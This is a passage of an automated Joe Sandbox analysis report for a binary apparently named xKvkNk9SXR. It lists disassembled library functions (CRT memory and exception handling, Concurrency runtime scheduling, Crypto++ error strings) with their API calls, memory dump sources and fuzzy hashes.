                                          • _ValidateLocalCookies.LIBCMT ref: 00A59198
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00A591C3
                                          • _ValidateLocalCookies.LIBCMT ref: 00A59218
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm$w#G!
                                          • API String ID: 1170836740-864629078
                                          • Opcode ID: a32bd6185ae1869ad53ac46350d8f2c5a6a80aba6e78abbac84c8c1a9a9bc2c3
                                          • Instruction ID: 2fe193df1539c1d0213fb638a2ac3fd0ee3ca61522f4d6425017b20b91872734
                                          • Opcode Fuzzy Hash: a32bd6185ae1869ad53ac46350d8f2c5a6a80aba6e78abbac84c8c1a9a9bc2c3
                                          • Instruction Fuzzy Hash: 1C418034A00629EBCF10DF68C884A9FBBB5BF45325F148255ED149F392D731AE49CB90
                                          Function 00A4EF87 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A4EF8E
                                          • List.LIBCONCRT ref: 00A4F00C
                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A4F031
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A4F03F
                                          • __EH_prolog3.LIBCMT ref: 00A4F04C
                                          • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 00A4F070
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: FreeH_prolog3ProcessorVirtual$Concurrency::details::Exception@8ListRootRoot::Throwstd::invalid_argument::invalid_argument
                                          • String ID: pExecutionResource
                                          • API String ID: 721108208-359481074
                                          • Opcode ID: 8f8fc99ce2b65097adb8c065a145b9d72bf07eec47bf8a846a4414d153e3ef13
                                          • Instruction ID: 65354c98be36d0ee5bb823e6223a00264e98331decbe519fc530f6affe27e8dc
                                          • Opcode Fuzzy Hash: 8f8fc99ce2b65097adb8c065a145b9d72bf07eec47bf8a846a4414d153e3ef13
                                          • Instruction Fuzzy Hash: 1F217375A40705AFCF08EF64C942BED77B5BFD8300F504469E9056B282DBB4AE458BA1
                                          Function 00A4E148 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73threadCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 00A4E18B
                                            • Part of subcall function 00A4F682: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 00A4F6D1
                                          • GetCurrentThread.KERNEL32 ref: 00A4E195
                                          • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00A4E1A1
                                            • Part of subcall function 00A4303F: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 00A43051
                                            • Part of subcall function 00A434E6: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 00A434ED
                                          • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 00A4E1E4
                                            • Part of subcall function 00A4F634: SetEvent.KERNEL32(?,?,00A4E1E9,00A4EF7D,00000000,?,00000000,00A4EF7D,00000004,00A4F629,?,00000000,?,?,00000000), ref: 00A4F678
                                          • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 00A4E1ED
                                            • Part of subcall function 00A4EC63: __EH_prolog3.LIBCMT ref: 00A4EC6A
                                            • Part of subcall function 00A4EC63: List.LIBCONCRT ref: 00A4EC99
                                          • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 00A4E1FD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedH_prolog3ListResourceResource::StateSubscriptionToggle
                                          • String ID: w#G!
                                          • API String ID: 2908504212-519468572
                                          • Opcode ID: 0a95828cb2976aa9c9d2c0fbc0da245d178d47502ba8e97b3df5fd0f582dda12
                                          • Instruction ID: 7fc529cdb10675b7e219a4bfba2ebfff92fefd33c01e3f3fbc979c912e385b4d
                                          • Opcode Fuzzy Hash: 0a95828cb2976aa9c9d2c0fbc0da245d178d47502ba8e97b3df5fd0f582dda12
                                          • Instruction Fuzzy Hash: 3921BD39500B109FCB24EF69CA908ABF3F9FF8C7007004A1EE44297661CB74BA02CB91
                                          Function 00A6E1DC Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: __freea$__alloca_probe_16
                                          • String ID: a/p$am/pm$w#G!
                                          • API String ID: 3509577899-2798019029
                                          • Opcode ID: 78be358e35a3d97f124329d4592881c761f0d1e2d3b3fae10291a0c98ae47c8b
                                          • Instruction ID: 71c5e9c0283f134cabcd68afe7bafad5b271e59b38508a75264e5cda60c57312
                                          • Opcode Fuzzy Hash: 78be358e35a3d97f124329d4592881c761f0d1e2d3b3fae10291a0c98ae47c8b
                                          • Instruction Fuzzy Hash: 09D1237D900206CADF24CF68C999BBEB7B1FF15704F24415AE912AB291E7359D80CBA1
                                          Function 009F6ED0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 274COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F71FF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: exceeds the maximum of $: footer length $: header length $: message length $w#G!
                                          • API String ID: 2005118841-1657204420
                                          • Opcode ID: 25ecff3fc56b8ca518f7755bd9f8384deae9b328037c04d31b8a6d0fa01d8ab9
                                          • Instruction ID: 9832ed04bc8face0e825da0e573acfa16bb5ba52b98bd1ae830ac9926c0d6e92
                                          • Opcode Fuzzy Hash: 25ecff3fc56b8ca518f7755bd9f8384deae9b328037c04d31b8a6d0fa01d8ab9
                                          • Instruction Fuzzy Hash: 9DA16DB5A00288EFDF21DFA4CC45FEEBBADAF98300F144555F945E7241DA749B048BA1
                                          Function 00A6ADD3 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: w#G!
                                          • API String ID: 0-519468572
                                          • Opcode ID: 0a26e51e127f12ff498e08cb2913d8c7ba890741282bda11cf67fcadc1f6f38d
                                          • Instruction ID: b1853b70fa3bf889193ab3316fb88c3fe46826d1bb7e1169d31451bb42df3e44
                                          • Opcode Fuzzy Hash: 0a26e51e127f12ff498e08cb2913d8c7ba890741282bda11cf67fcadc1f6f38d
                                          • Instruction Fuzzy Hash: 7F71A271A002269FDF31CF95C884ABFBBB5FF65350F154229E821A7181DB719D81CBA2
                                          Function 00A7D3AE Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 5db9bb7548decff266ecf935bfb16ed3a32017649fcae6f006f890b3b3aa9ff9
                                          • Instruction ID: 9041817c35342ddeedc08179c5c6d47902fd5254b0b208efab0c3552dd8a60b6
                                          • Opcode Fuzzy Hash: 5db9bb7548decff266ecf935bfb16ed3a32017649fcae6f006f890b3b3aa9ff9
                                          • Instruction Fuzzy Hash: 65619571D00205AFDB20DFA8CD41BAEBBF5EF49720F14C16AE958EB292E7709D418B50
                                          Function 00A70EF8 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A75B94: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A57B27,?,?,?,?,?,009B1F07,?,?,?), ref: 00A75BC6
                                          • _free.LIBCMT ref: 00A71003
                                          • _free.LIBCMT ref: 00A7101A
                                          • _free.LIBCMT ref: 00A71039
                                          • _free.LIBCMT ref: 00A71054
                                          • _free.LIBCMT ref: 00A7106B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free$AllocateHeap
                                          • String ID: w#G!
                                          • API String ID: 3033488037-519468572
                                          • Opcode ID: 27972bfc987cb8a259e241c17a6e58a5dce925063a2b6c2376af74647bee4275
                                          • Instruction ID: 1a7d9c825ae7f970407c3738c4429f14855c83035b67ab0a532ae6e6e54e6692
                                          • Opcode Fuzzy Hash: 27972bfc987cb8a259e241c17a6e58a5dce925063a2b6c2376af74647bee4275
                                          • Instruction Fuzzy Hash: CC518D71A00604AFDB20DF69CD41B6AB7F4EF49724B14C569E84DDB291E731EA428B80
                                          Function 009FC940 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 161COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FCA08
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FCAC8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: AAD$AuthenticatedDecryptionFilter$AuthenticatedEncryptionFilter$w#G!
                                          • API String ID: 2005118841-787514302
                                          • Opcode ID: ea729edff4cfaf6542ee3319fe5c532ad0bbca879dfa0cebbedb6faaa1149131
                                          • Instruction ID: df561f414b17cd5f9fd5aa1ab9a76dfaf117fa77e2ad646f5d28cb9eacd09d6c
                                          • Opcode Fuzzy Hash: ea729edff4cfaf6542ee3319fe5c532ad0bbca879dfa0cebbedb6faaa1149131
                                          • Instruction Fuzzy Hash: C3516D7194420DAFCF15DFA0DC41FAEBBB9FB48720F004929FA1267691DB71A954CBA0
                                          Function 00A58CE6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 141COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: EqualOffsetTypeids
                                          • String ID: w#G!$w#G!
                                          • API String ID: 1707706676-1134387879
                                          • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                          • Instruction ID: b14bf43b5876071b5bd834296dd5add301acb19ebf4a5e2a5f230eb1c52fbdc8
                                          • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                          • Instruction Fuzzy Hash: A7516935A042099FDF11CF69C4825AEBBF4BF15711B14489AEC91B7251DB3AED09CB90
                                          Function 009FC760 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 134COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FC804
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FC8B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw$ExceptionRaise
                                          • String ID: AAD$AuthenticatedDecryptionFilter$AuthenticatedEncryptionFilter$w#G!
                                          • API String ID: 3476068407-787514302
                                          • Opcode ID: 65046b788c1b8164c029df6e57db350aec4aa4dfbdd3d7385855730f4f410d63
                                          • Instruction ID: 114dd657c8cd2ebbf14b353f7913d47a9d939eb1c210dcbe99b3d83eb969ffb1
                                          • Opcode Fuzzy Hash: 65046b788c1b8164c029df6e57db350aec4aa4dfbdd3d7385855730f4f410d63
                                          • Instruction Fuzzy Hash: 4B41937190060CEFCB14DFA4CD45FAEB7B8FB44720F104569EA16A7681DB70B908CB90
                                          Function 00A70043 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID: w#G!
                                          • API String ID: 269201875-519468572
                                          • Opcode ID: 2ce54c62067d4f0623e8f5b5ddbd1935296731ca58c61673591cc749ba5737aa
                                          • Instruction ID: 4a4eeba23428f28d98454a3832754558a3eb3787a192e3b1c9f209b944ff9a6c
                                          • Opcode Fuzzy Hash: 2ce54c62067d4f0623e8f5b5ddbd1935296731ca58c61673591cc749ba5737aa
                                          • Instruction Fuzzy Hash: 0F419236A00204DFCB24DF78CD81E5AB7B6EF89714F15C569E619EB241D731AD02CB41
                                          Function 009B6620 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 129COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B6690
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B66EE
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009B6742
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw$___std_exception_copy
                                          • String ID: CryptoMaterial: this object contains invalid values$CryptoMaterial: this object does not support precomputation$w#G!
                                          • API String ID: 4178755008-2110003470
                                          • Opcode ID: fc65e30fcbecf1922ad1e74a412ee99b418997675822c562ec82fe5593e3303c
                                          • Instruction ID: 2f2d6d2e808985f472e46c7c88b657803bfa9d1e28a436b3dedb6f4d44ecf5fe
                                          • Opcode Fuzzy Hash: fc65e30fcbecf1922ad1e74a412ee99b418997675822c562ec82fe5593e3303c
                                          • Instruction Fuzzy Hash: C3416E71900608ABCB05DF95DD41FDEB7F8FB09710F10866AF921A3680EB75AA04CB90
                                          Function 00A7B0FD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,00A9ED38,00000000,00000000,8B56FF8B,00A706C7,?,00000004,00000001,00A9ED38,0000007F,?,8B56FF8B,00000001), ref: 00A7B14A
                                          • __alloca_probe_16.LIBCMT ref: 00A7B182
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A7B1D3
                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A7B1E5
                                          • __freea.LIBCMT ref: 00A7B1EE
                                            • Part of subcall function 00A75B94: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A57B27,?,?,?,?,?,009B1F07,?,?,?), ref: 00A75BC6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                          • String ID: w#G!
                                          • API String ID: 313313983-519468572
                                          • Opcode ID: c5ed050fad92b96caf34b2ff585ba70da2894433ce85e0e10e3c77874f480a29
                                          • Instruction ID: 3b967f28db7106a8b69c09c3adb6b8b67d205bc9364a4b70cb58ef2bd461bab3
                                          • Opcode Fuzzy Hash: c5ed050fad92b96caf34b2ff585ba70da2894433ce85e0e10e3c77874f480a29
                                          • Instruction Fuzzy Hash: 2031A072A1021AABDF24DF64DC51EAE7BB5EB40710F588229FC18DB250EB35DD51CBA0
                                          Function 00A528CD Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00A528F5
                                            • Part of subcall function 00A52662: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00A52695
                                            • Part of subcall function 00A52662: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00A526B7
                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A52972
                                          • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00A5297E
                                          • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00A5298D
                                          • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00A52997
                                          • Concurrency::location::_Assign.LIBCMT ref: 00A529CB
                                          • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00A529D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
